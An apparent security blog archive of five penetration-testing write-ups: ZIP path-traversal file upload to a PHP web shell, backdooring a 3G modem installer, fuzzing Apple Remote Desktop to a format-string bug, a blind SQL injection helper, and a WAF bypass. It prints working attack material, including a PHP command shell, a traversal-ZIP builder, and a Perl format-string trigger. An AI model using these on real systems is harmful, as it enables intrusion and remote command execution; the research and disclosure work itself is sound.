Monthly Archives: January 2014

Compressed file upload and command execution

In this post I would like to share some experiences from a web application hacking project. After I got access to the admin section of the web application, I realized that a file upload function was available to administrators. The application properly denied uploading dynamic scripts (e.g. .php) and it was not possible to bypass this defense. However, the upload function accepted compressed files and decompressed them automatically, although the upload directory itself did not allow running PHP files.

One could easily assume that this setup protects against OS-level command execution via malicious file uploads, but unfortunately this is not true. Since the ZIP archive format supports hierarchical compression and entry names can reference higher-level directories, we can escape from the safe upload directory by abusing the decompression feature of the target application.

To achieve remote command execution I took the following steps:

1. Create a PHP shell:

        <?php system($_REQUEST['cmd']); ?>

2. Use “file spraying” and create a compressed zip file:

root@s2crew:/tmp# for i in `seq 1 10`;do FILE=$FILE"xxA"; cp simple-backdoor.php $FILE"cmd.php";done
root@s2crew:/tmp# ls *.php
simple-backdoor.php  xxAxxAxxAcmd.php        xxAxxAxxAxxAxxAxxAcmd.php        xxAxxAxxAxxAxxAxxAxxAxxAxxAcmd.php
xxAcmd.php           xxAxxAxxAxxAcmd.php     xxAxxAxxAxxAxxAxxAxxAcmd.php     xxAxxAxxAxxAxxAxxAxxAxxAxxAxxAcmd.php
xxAxxAcmd.php        xxAxxAxxAxxAxxAcmd.php  xxAxxAxxAxxAxxAxxAxxAxxAcmd.php
root@s2crew:/tmp# zip test.zip xx*.php
  adding: xxAcmd.php (deflated 40%)
  adding: xxAxxAcmd.php (deflated 40%)
  adding: xxAxxAxxAcmd.php (deflated 40%)
  adding: xxAxxAxxAxxAcmd.php (deflated 40%)
  adding: xxAxxAxxAxxAxxAcmd.php (deflated 40%)
  adding: xxAxxAxxAxxAxxAxxAcmd.php (deflated 40%)
  adding: xxAxxAxxAxxAxxAxxAxxAcmd.php (deflated 40%)
  adding: xxAxxAxxAxxAxxAxxAxxAxxAcmd.php (deflated 40%)
  adding: xxAxxAxxAxxAxxAxxAxxAxxAxxAcmd.php (deflated 40%)
  adding: xxAxxAxxAxxAxxAxxAxxAxxAxxAxxAcmd.php (deflated 40%)

3. Use a hex editor or vi to change the "xxA" sequences to "../" (same length, so the archive structure stays valid); I used vi:

:set modifiable
:%s/xxA/..\//g
:x!

Only one step remained: upload the ZIP file and let the application decompress it! If it succeeds and the web server has sufficient privileges to write to the target directories, there will be a simple OS command execution shell on the system:
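The spraying-and-patching steps above can also be scripted directly, since Python's zipfile module stores entry names verbatim; a minimal sketch (the archive and file names are placeholders):

```python
import zipfile

# Build an archive whose entries traverse out of the extraction
# directory. Depths 1-10 cover the unknown nesting level of the
# upload directory, mirroring the "file spraying" step above.
payload = "<?php system($_REQUEST['cmd']); ?>"

with zipfile.ZipFile("evil.zip", "w") as zf:
    for depth in range(1, 11):
        # zipfile does not sanitize names, so "../" sequences survive
        name = "../" * depth + "cmd.php"
        zf.writestr(name, payload)

print(zipfile.ZipFile("evil.zip").namelist()[0])  # ../cmd.php
```

This produces in one step the same archive we built by hand with cp, zip and vi.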


Banging 3G rocks

I’ve always wanted to take a look at the security of 3G modem sticks, but as a more “high-level” guy I kept procrastinating the task of messing with kernel drivers and such, and settled for installing these devices into disposable virtual machines for security.

But after I saw Nikita Tarakanov's presentation about Huawei modems (slides here), I realized that many interesting things can be found using rather simple techniques. So I grabbed the first stick in sight and started to investigate how the userland part of its installed software works.

The stick is an ONDA Communications MF195 (a ZTE product), provided by T-Mobile. It works pretty well with Windows and OS X; unfortunately for me, I couldn't get it to work under Linux :(

As it turns out, the situation with ZTE is quite similar to Huawei, in that both have issues with file permissions. The installed software has numerous configuration options for external URLs; for example, here is the content of [SW home]/Bin/UpdateCfg.ini:


And yes, this file is writable by any user, along with the main executable that is started at every login with the privileges of the logged-in user, creating a trivial way for local user impersonation or privilege escalation:

The “Rendszergazdák” group is the equivalent of “Administrators” in Hungarian Windows versions

We have to note, though, that this is still better than Huawei's ouc.exe, which is also world-writable and runs as a SYSTEM service…
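Hunting for such loose ACLs can be partly automated; here is a rough triage sketch that scans icacls-style output (the group names and the sample below are illustrative, not taken from the actual device):

```python
# Flag ACL entries that grant write-equivalent access to broad groups.
LOOSE_RIGHTS = ("(F)", "(M)", "(W)")   # full control, modify, write
WEAK_PRINCIPALS = ("Everyone", "BUILTIN\\Users", "Authenticated Users")

def loose_entries(icacls_output):
    """Return the ACL lines that let unprivileged users modify a file."""
    hits = []
    for line in icacls_output.splitlines():
        if any(p in line for p in WEAK_PRINCIPALS) and \
           any(r in line for r in LOOSE_RIGHTS):
            hits.append(line.strip())
    return hits

# Illustrative sample in icacls layout (path on the first line only):
sample = """C:\\Modem\\Bin\\UpdateCfg.ini BUILTIN\\Users:(F)
             NT AUTHORITY\\SYSTEM:(F)
             BUILTIN\\Administrators:(F)"""
print(loose_entries(sample))
```

Running this over the install directory's ACL dump immediately highlights the world-writable executable and config files discussed above.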

After these little games I started to wonder if I could backdoor the stick by changing the installer. For this task I used a different stick, an out-of-use ZTE K3570-Z from Vodafone, because I felt I could easily brick the MF195, which I use regularly.

The task sounds trivial: when plugged in without the proper drivers installed, the device shows up as a USB CD-ROM drive, so all we have to do is change the contents of this virtual optical drive.

But there are some problems. First of all, installation fails most of the time even with the original software, which makes testing really painful. The filesystem is ISO 9660, which is read-only by design, so we first have to repack the FS contents before reflashing, but this should be a trivial task. The biggest problem is forcing the OS to write to a device that it knows to be a read-only CD-ROM. For this I had to use the dc-unlocker tool, which is proprietary, pirate-ish and needs paid registration (unless you find some “demo” codes on the web, which you obviously wouldn't want to do…), so a more open solution would be highly appreciated.


I managed to ride the fail train for about an hour because I didn't read the instructions on the screen, so if you plan to do similar things yourself, spare yourself some time and RTFM. The COM port settings can be figured out from the Device Manager after the drivers are loaded, and you may also need to enable the diagnostics port using the menu option on the Unlock tab of dc-unlocker.

I extracted the installer image using dd, mounted the image as a loop device, changed a few things for a proof of concept, then created a new image using mkisofs and wrote it out using dc-unlocker (the Flash writing feature is free). To get the stick working again, you have to disable the diagnostics port after the new image is written out.
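The repack flow above can be sketched as a short script; the device node, mount point and image names below are placeholders and assumptions, and the actual flashing step stays manual in dc-unlocker:

```python
import subprocess

# Sketch of the image rebuild flow described above. The device node,
# mount point and file names are illustrative placeholders.
DEVICE = "/dev/sr1"       # the stick's virtual CD-ROM drive (assumption)
ORIG = "original.iso"     # dumped image
WORK = "/mnt/stick"       # loop mount point for inspection
NEW = "modified.iso"      # repacked image to flash with dc-unlocker

def rebuild_commands():
    """Return the shell steps: dump the drive, loop-mount the dump,
    then repack the (edited) tree into a new ISO 9660 image."""
    return [
        ["dd", "if=" + DEVICE, "of=" + ORIG],
        ["mount", "-o", "loop,ro", ORIG, WORK],
        # ...copy the tree somewhere writable and edit it in between...
        ["mkisofs", "-J", "-R", "-o", NEW, WORK],
    ]

for cmd in rebuild_commands():
    print(" ".join(cmd))
    # subprocess.check_call(cmd)  # only on a machine with the stick attached
```

The check_call line stays commented here; run the commands only on a box with the target stick attached.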

This way I managed to place arbitrary content on the virtual drive of the stick. I used msfvenom to plant a custom payload into the original installer, thus keeping the whole device working. Since the binaries supplied by the vendor/service provider are not digitally signed, this change wouldn't be noticed by the victim in a real situation.

Aside from satisfying my curiosity, this method could be used to create more convincing baits for social engineering projects, while solving the problem of potential network restrictions in one shot.

A piece of malware could also ensure its persistence by maintaining a copy of itself on attached USB modems. The hard part in this latter case is that rewriting the image on the stick takes quite a long time (a typical image is written out in around 10 minutes), and different hardware would probably need different infection methods.

While I don’t find the discussed vulnerability particularly dangerous, portable cellular modems are great examples of the tendency to blindly trust any hardware – no matter how easily it can be backdoored – as long as it has a nice casing with a vendor logo printed on it.

If you managed to extract some interesting info about your modems don’t hesitate to share it with us in the comments!


How did I find the Apple Remote Desktop bug? – CVE-2013-5135

Inspired by the Windows Remote Desktop bug (CVE-2012-0002), I created a simple network protocol fuzzer. This is a dumb fuzzer that iterates every single byte position through the values 0 to 255:

import socket
import struct
import sys

# Placeholders for the sniffed protocol exchange
init1 = "Sniffed network connection part 1"
init2 = "Sniffed network connection part 2"
init3 = "Sniffed network connection part 3"

act = init3
print len(act)
for i in range(int(sys.argv[1]), len(act)):
    for j in range(0, 256):
        buffer = struct.pack('<B', j)             # the mutated byte value
        x = act[:i] + buffer + act[i + len(buffer):]
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect(('', 5900))                     # hardcoded IP address
        print str(i) + " " + str(j)
        s.send(init1)                             # replay the sniffed handshake
        data = s.recv(1024)
        s.send(init2)
        data = s.recv(1024)
        s.send(x)                                 # send the mutated packet
        data = s.recv(1024)
        s.close()

This approach may look especially dumb, since the Apple VNC protocol is encrypted and the changes the fuzzer makes to bytes of the ciphertext result in a disaster in the decrypted plaintext, but eventually this technique led to the discovery of the vulnerability. I ran the fuzzer and watched the logs and the CrashReporter files. The /var/log/secure.log file contained the following lines:

Jan 14 14:52:14 computer screensharingd[26350]: Authentication: FAILED :: User Name: m?>H?iYiH3`'??

The /Library/Logs/DiagnosticReports/ directory also contained a lot of crash files. This meant two things: I had found an interesting bug, and screensharingd runs with root privileges (this directory holds the crash files of privileged processes). CrashWrangler said this is an unexploitable crash, but I don't trust this tool blindly ;)
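To catch hits while the fuzzer runs, it helps to watch the crash report directory for new files between iterations; a minimal polling sketch (the path is the one above, but any directory works):

```python
import os
import time

def watch_new_files(directory, seen=None):
    """Return (new files since the last snapshot, current snapshot)."""
    current = set(os.listdir(directory))
    new = current - seen if seen is not None else set()
    return new, current

# Example loop: poll the crash report directory between fuzz rounds.
crash_dir = "/Library/Logs/DiagnosticReports"  # adjust for your system
if os.path.isdir(crash_dir):
    _, snapshot = watch_new_files(crash_dir)
    time.sleep(1)  # in practice: one fuzzer iteration goes here
    fresh, snapshot = watch_new_files(crash_dir, snapshot)
    for name in fresh:
        print("new crash report:", name)
```

Logging the fuzzer's current (i, j) position next to each new crash file makes it easy to map a crash back to the byte mutation that caused it.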

Let's look at the crash in the debugger:

bash-3.2# while true;do for i in $( ps aux | grep -i screensharingd | grep -v grep | awk '{print $2}');do gdb --pid=$i;done;done
GNU gdb 6.3.50-20050815 (Apple version gdb-1822) (Sun Aug  5 03:00:42 UTC 2012)
Copyright 2004 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "x86_64-apple-darwin".No symbol table is loaded.  Use the "file" command.
/Users/depth/.gdbinit:2: Error in sourced command file:
No breakpoint number 1.
/Users/depth/30632: No such file or directory
Attaching to process 30632.
Reading symbols for shared libraries . done
Reading symbols for shared libraries .......................................................................................................................................... done
Reading symbols for shared libraries + done
0x00007fff89e8e67a in mach_msg_trap ()
(gdb) set follow-fork-mode child 
(gdb) c
Program received signal EXC_BAD_ACCESS, Could not access memory.
Reason: KERN_INVALID_ADDRESS at address: 0x0000000000000002
[Switching to process 30632 thread 0x2b03]
0x00007fff8e2a0321 in __vfprintf ()
(gdb) i reg
rax            0x2	2
rbx            0x10778ba5c	4420319836
rcx            0x37	55
rdx            0x10778a810	4420315152
rsi            0x7f9a22b00000	140299983650816
rdi            0x106926400	4405224448
rbp            0x10778aa40	0x10778aa40
rsp            0x10778a610	0x10778a610
r8             0x106926400	4405224448
r9             0x62	98
r10            0x1224892248900008	1307320572183576584
r11            0x10778aaa8	4420315816
r12            0xb	11
r13            0x38	56
r14            0x0	0
r15            0x6e	110
rip            0x7fff8e2a0321	0x7fff8e2a0321 <__vfprintf+3262>
eflags         0x10246	66118
cs             0x2b	43
ss             0x0	0
ds             0x0	0
es             0x0	0
fs             0x0	0
gs             0x0	0
(gdb) x/s $rbx
0x10778ba5c:	 " :: Viewer Address: :: Type: DH"

This is very interesting. I assumed the "*printf" error meant a common buffer overflow or a format string issue. Let's see the problematic function:

(gdb) bt
#0  0x00007fff8e2a0321 in __vfprintf ()
#1  0x00007fff8e2ea270 in vasprintf_l ()
#2  0x00007fff8e2d9429 in asl_vlog ()
#3  0x00007fff8e27f7d4 in vsyslog ()
#4  0x00007fff8e27f879 in syslog () # Vulnerability here!
#5  0x00000001075484df in _mh_execute_header ()
#6  0x0000000107521892 in _mh_execute_header ()
#7  0x0000000107532657 in _mh_execute_header ()
#8  0x000000010752d7c1 in _mh_execute_header ()
#9  0x00007fff87c46ce6 in PrivateMPEntryPoint ()
#10 0x00007fff8e2ab8bf in _pthread_start ()
#11 0x00007fff8e2aeb75 in thread_start ()

I fired up IDA Pro and looked for the invalid authentication chain of the screensharingd binary. First I searched for the "FAILED" keyword in order to find the subroutine of interest:


But it turns out that the "Authentication FAILED" string leads us to the interesting part of the code:


This string is referenced by the sub_1000322a8 function:


I followed the cross reference to the "Authentication : FAILED" string:


Yes, here is the critical part of the binary (DH authentication is the current one based on the secure.log file):


The subroutine builds the syslog message with proper format strings, but it does not sanitize the username field before calling syslog(), so an attacker can perform a format string attack. The easiest way to check this assumption is to try to authenticate using the Apple Remote Desktop client:


And check the secure.log file:


Great! :) This is a format string vulnerability in the Apple Remote Desktop protocol. I spent a few days investigating the vulnerability and trying to write a working exploit, with no success. The problems are:

  • null bytes in the memory addresses (64-bit architecture)
  • relatively small buffer space (~2*64 bytes)
  • non-executable stack

If you have any ideas on the exploitation of this issue, do not hesitate to share them with me! To help you get started, I wrote a simple trigger script:

# For ARD (Apple Remote Desktop) authentication you must also specify a username. 
# You must also install Crypt::GCrypt::MPI and Crypt::Random
# CVE: CVE-2013-5135
# Software: Apple Remote Desktop
# Vulnerable version: < 3.7
use Net::VNC;
$target = "";
$password = "B"x64; #max 64
$a = "A"x32; # max 64
$payload = $a."%28\$n"; # CrashWrangler output-> is_exploitable=yes:instruction_disassembly=mov    %ecx,(%rax):instruction_address=0x00007fff8e2a0321:access_type=write
print "Apple VNC Server @ $target\n";
print "Check the /var/log/secure.log file ;) \n";
$vnc = Net::VNC->new({hostname => $target, username => $payload, password => $password});

This was the whole story of CVE-2013-5135 from the beginning of 2013. Every bug hunting approach can be a good one, so try something different from everybody else. Happy bug hunting!

Duncan – Expensive injections

During a web application test, one of the most precious bugs you can find is a good old SQL injection: these vulnerabilities let you bypass the security controls of the application, elevate your privileges, find new (possibly vulnerable) functionality, and in the end take control over the entire database server and possibly pivot your attack into the depths of the target network.

Fortunately for application operators, SQL injection vulnerabilities are not that easy to come by, thanks to robust development frameworks and smart testing tools. That being said, these vulnerabilities are here to stay, although many times you can only discover them the hard, manual way, hidden deep inside some complex feature. After discovery, exploitation can be even more painful, since information emitted by the database often disappears as it goes through the layers of the application, leaving you with a fully blind scenario. And although there are great generic tools (like SQLmap or SQLninja) to retrieve meaningful information by taking advantage of these bugs, there are many cases when configuring or even patching your favorite software takes more effort in the end than writing your specific exploit from scratch.

But we computer people are lazy and hate to reinvent the wheel every time we stumble upon some exotic injection, not to mention the debugging frenzy that a speed-coded search algorithm or a multi-threaded program can cause.

This is why I created Duncan (named after the blind, weak but loyal attendant of the Prince of Thieves), a simple but powerful Python program skeleton/module that saves you the most daunting tasks of SQLi exploit development: it takes care of threading, implements tested search algorithms and provides a convenient command line interface (that might be an oxymoron…) for configuration. You only have to implement a single method that checks the value of one character of a custom query result (typically doable in 5-8 lines of code) and you can start looting; Duncan takes care of everything else.

Good old Duncan

Time == Money

Besides the simple blind injection – which was really just an exercise to clean the rust off the coder part of my brain – I also wanted to support time-based injections, which may look identical to a standard blind injection, but there is a catch:

While typical blind injections are usually exploitable through some kind of 1-bit information leak and are basically identical to the well-known number guessing game, time-based injection has an interesting property: you have to “pay some price” (spend a considerable amount of time) every time you guess (in)correctly. Optimizing an exploit to minimize this cost sounded like a fun idea to play with, so I brought up the topic at Camp0, where we created a simple test program and some proof of concept algorithms (the algorithms are named after my participating friends, CJ and Synapse – kudos to them!).

We concluded that as the set of possible guesses shrinks, linear search becomes more beneficial than binary, since in the former case the number of expensive guesses is constant (but you have to make more cheap requests overall), while in the latter case the number of expensive requests can be expected to be proportional to the logarithm of the set size (but we have to make fewer requests overall).

So basically both implemented algorithms fall back to linear search under different conditions related to the set size and the ratio of the costs of the correct/incorrect guesses.
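The trade-off can be illustrated with a toy cost model; the delay values and charset sizes below are arbitrary examples, not Duncan's actual implementation:

```python
# Toy model of time-based blind SQLi guessing: a "true" guess makes the
# injected SLEEP fire (expensive), a "false" guess returns fast (cheap).
T_TRUE = 2.0    # assumed delay in seconds when the condition holds
T_FALSE = 0.1   # assumed cost of a normal, fast response

def linear_cost(secret, charset):
    """Equality probes in order: exactly one expensive request (the hit)."""
    cost = 0.0
    for c in charset:
        if c == secret:
            return cost + T_TRUE
        cost += T_FALSE
    return cost

def binary_cost(secret, charset):
    """Range probes ("is it greater than X?"): log2(n) requests,
    roughly half of which take the expensive branch."""
    lo, hi = 0, len(charset) - 1
    cost = 0.0
    while lo < hi:
        mid = (lo + hi) // 2
        if secret > charset[mid]:
            cost += T_TRUE
            lo = mid + 1
        else:
            cost += T_FALSE
            hi = mid
    return cost

def average(costfn, charset):
    return sum(costfn(s, charset) for s in charset) / len(charset)

small, big = list(range(16)), list(range(256))
print(average(linear_cost, small), average(binary_cost, small))
print(average(linear_cost, big), average(binary_cost, big))
```

With these numbers linear search wins on the 16-element set while binary search wins on the 256-element set, which is exactly the set-size/cost-ratio dependence described above.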

This works pretty well in model implementations, saving 20-30% time on average, so I decided to implement a similar algorithm in Duncan too.

Unfortunately, as it turned out, the optimizations only made a (positive) difference in some unlikely edge cases, and implementing a simple auto-tuning mechanism for timing could bring much bigger benefits. Luckily, Duncan allows you to implement such more advanced algorithms pretty easily :)

Update 2017.01.03: After 3 years, Erick Wong from Mathematics Stack Exchange provided us with a comprehensive answer to this problem. As it turned out, “the optimized algorithm can yield significant performance gain in case the penalty is big (e.g. querying a large dataset)”

So feel free to use Duncan in your own pentest projects or experiment with more advanced algorithms, the source code along with some implementation and usage examples are available in our GitHub repository.

WAF bypass made easy

In this post I will share my experiences testing a web application protected by a web application firewall (WAF). Investigating the parameters of the web interfaces revealed that I could perform XSS attacks in some limited ways. The target implemented blacklist-based filtering that restricted some HTML tags and event handlers. Since this restriction appeared in quite unusual places, I suspected that there might be a WAF in front of the application. To verify my suspicion:

  • I tested the interfaces with random HTTP parameters containing XSS payloads. Most of the time a WAF checks all of the input parameters, while the server-side validation only checks the expected ones;
  • I used the Wafit tool.
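The first of these checks can be scripted by pairing an XSS payload with parameter names the application surely does not expect; a minimal sketch (the payload and naming scheme are purely illustrative):

```python
import random
import string

def junk_param_probes(payload, count=5, name_len=8, seed=None):
    """Generate (param_name, payload) pairs with random, surely-unexpected
    parameter names: a WAF typically inspects them all, while server-side
    validation usually ignores parameters it does not know about."""
    rng = random.Random(seed)
    probes = []
    for _ in range(count):
        name = "".join(rng.choice(string.ascii_lowercase)
                       for _ in range(name_len))
        probes.append((name, payload))
    return probes

for name, value in junk_param_probes("<script>alert(1)</script>", seed=1):
    print("%s=%s" % (name, value))
```

If requests with payloads in these junk parameters get blocked while clean requests pass, something in front of the application is inspecting every parameter.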

These tests underpinned my assumption: there was indeed some application level firewall in front of my target.

In order to map the filter rules I created a list of HTML4 and HTML5 tags and event handlers. After this I could easily test the allowed tags and event handlers with Burp Suite Professional:

HTML events (click to enlarge)


HTML tags (click to enlarge)
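Such a tag × event handler wordlist for Burp Intruder can be generated with a short script; the lists below are small illustrative subsets of the full HTML4/HTML5 inventories:

```python
# Cross every tag with every event handler to enumerate what the
# filter lets through. Extend the lists with the full HTML4/HTML5
# inventories for real testing.
TAGS = ["img", "svg", "body", "video", "details"]
HANDLERS = ["onerror", "onload", "onmouseover", "ontoggle"]

def xss_probes(tags, handlers):
    return ["<%s %s=alert(1)>" % (t, h) for t in tags for h in handlers]

probes = xss_probes(TAGS, HANDLERS)
print(len(probes))   # 20
print(probes[0])     # <img onerror=alert(1)>
```

Feeding the generated list to Intruder and diffing the responses quickly maps out exactly which tag/handler combinations the blacklist misses.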

Based on the results we could only perform some browser-specific attacks, typically against IE 6.0. However, many web applications handle parameters passed via GET and POST in the same way. I performed the tests again, now submitting the crafted parameters in the HTTP POST body, and found that the WAF didn't interrupt my requests and the application processed my input through the same vulnerable code path. This way I could perform XSS without limitation, and surprisingly I was also able to find an SQL injection issue.

When you implement a WAF in your infrastructure, the most important concepts are:

  • Know your system: Collect the applications and HTTP parameters to be protected and understand how they are used (data types, expected format, etc.);
  • Consult somebody with an offensive attitude (like a penetration tester) before you implement the defense;
  • Be aware of the limits of blacklist-based filtering;

An improper WAF implementation can lead to a false sense of security, which can result in more damage than operating applications with known security issues.